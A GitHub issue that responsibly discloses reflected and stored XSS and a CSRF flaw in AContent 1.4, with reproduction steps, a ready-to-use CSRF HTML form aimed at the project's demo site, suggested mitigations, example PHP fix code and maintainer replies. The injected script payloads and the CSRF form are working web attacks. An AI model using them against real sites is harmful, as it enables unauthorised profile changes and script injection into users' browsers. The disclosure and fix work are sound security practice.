
XSS and CSRF issues on v1.4 #29

Open
metamorfosec opened this issue Aug 27, 2018 · 4 comments

Comments

@metamorfosec

Hello...
I have found XSS and CSRF issues in atutor/AContent v1.4.
I used AContent 1.4 Demo on your official website.
Please let me know if you need additional information.
I hope this is the right channel to disclose security issues, because you requested that any bugs be posted to this GitHub page.
Regards.

Findings

XSS (Reflected)

https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>

XSS (Stored)

1 (editor/edit_content_folder.php)

  1. In the Content Folder Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

2 (editor/edit_content.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

3 (editor/edit_content.php)

  1. In the Title Field with HTML format selected, please enter any clickable name. For example, <script>test</script>.
  2. In the Body, please enter <script>alert(document.domain)</script>
  3. Click Preview Button to trigger the JS alert
  4. Click Save Button
  5. Click <script>test</script> to trigger the JS alert again

4 (tests/edit_test.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert

5 (tests/edit_question_likert.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button
  4. Every time we are on the Question Bank (tests/question_db.php), the JS alert is also triggered

6 (tests/create_question_matchingdd.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

7 (tests/create_question_matching.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

8 (tests/create_question_multianswer.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

9 (tests/create_question_multichoice.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

10 (tests/create_question_long.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

11 (tests/edit_question_ordering.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

12 (tests/edit_question_truefalse.php)

  1. In the Statement Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button

13 (tests/question_cats_manage.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Delete Button

14 (course/course_property.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert

CSRF

  1. Log in at the official website.
  2. Save the HTML code below and give it a name, e.g. CSRF_Payload.html.
  3. Open the payload in the same browser and execute it by clicking the CLICK ME button.

<html>
	<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
		<input name="password_error" type="hidden">
		<input type="hidden" name="form_password_hidden" value="">
		<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
		<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
		<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
		<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
		<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
		<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
		<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
		<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
		<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
		<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
		<!-- Click the button to execute this CSRF Payload -->
		<input type="submit" name="submit" value="CLICK ME" class="submit">
	</form>
</html>

Suggested Mitigations

  1. For the XSS issues, we can use input validation and an escape function for all user-supplied inputs. I see you made special characters become like &lt;script&gt;alert(document.domain)&lt;/script&gt; in certain places, but not in many other places, so those are still vulnerable to XSS.
  2. For the CSRF issue, we can use a CSRF token. It would be better if Change Password and Change Email Address also used a CSRF token.
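
As an added illustration of the two mitigations suggested above (this is example code, not code from AContent or from the reporter's pull request), the PHP helpers below escape a stored title at every point where it is rendered and bind a per-session CSRF token to the profile form. The function names `e`, `csrf_token`, `csrf_field` and `csrf_valid`, the session key `csrf_token`, and the sample form are assumptions for illustration.

```php
<?php
// Added example (not AContent code): output escaping and CSRF token helpers.
declare(strict_types=1);
session_start();

// Escape at output time, everywhere a user-supplied value is rendered.
// ENT_QUOTES also encodes quotes, so the result is safe inside attributes
// such as value="..." as well as in element text.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Issue (or reuse) a random per-session CSRF token.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every state-changing form (profile, password, email).
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="' . e(csrf_token()) . '">';
}

// Constant-time comparison of the submitted token with the session token.
function csrf_valid(?string $submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Profile handler: a cross-site POST carries no valid token, so it is rejected
// before any field of the logged-in user is touched.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // ... update first_name, last_name, etc. for the logged-in user here ...
}

// Rendering: the stored title is escaped wherever it appears, including the
// delete-confirmation and preview pages where the report shows it executing.
$title = '<script>alert(document.domain)</script>';   // constructed sample input
echo '<h2>' . e($title) . '</h2>';
echo '<form method="post" action="profile/index.php">' . csrf_field()
   . '<input name="first_name" value="' . e($_SESSION['first_name'] ?? '') . '">'
   . '<input type="submit" value="Save"></form>';
```

The same `csrf_field()` / `csrf_valid()` pair covers the Change Password and Change Email Address forms mentioned above, since the token is tied to the session rather than to one form.
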
@gregrgay
Collaborator

This application is no longer being maintained, though we will accept pull requests to address these issues.

@metamorfosec
Author

Hi, thank you for your response.
I have forked your work to help address these issues.
I will make a pull request later.
Regards.

@gregrgay
Collaborator

gregrgay commented Sep 7, 2018

Will watch for your pull requests. Thx

@metamorfosec
Author

Hello,
I have just made a pull request.
I have added a new folder called protection that contains third-party classes or libraries to prevent XSS and CSRF.
By the way, I cannot access the edit test and edit question features because of TR_ERROR_NO_ITEM_FOUND, so I cannot reproduce numbers 4, 5, 11, and 12 of the Stored XSS findings above. Anyway, I have updated the files related to them, as in the create question feature.
Some warning messages may still appear, and I am still looking for the root cause.
Regards.
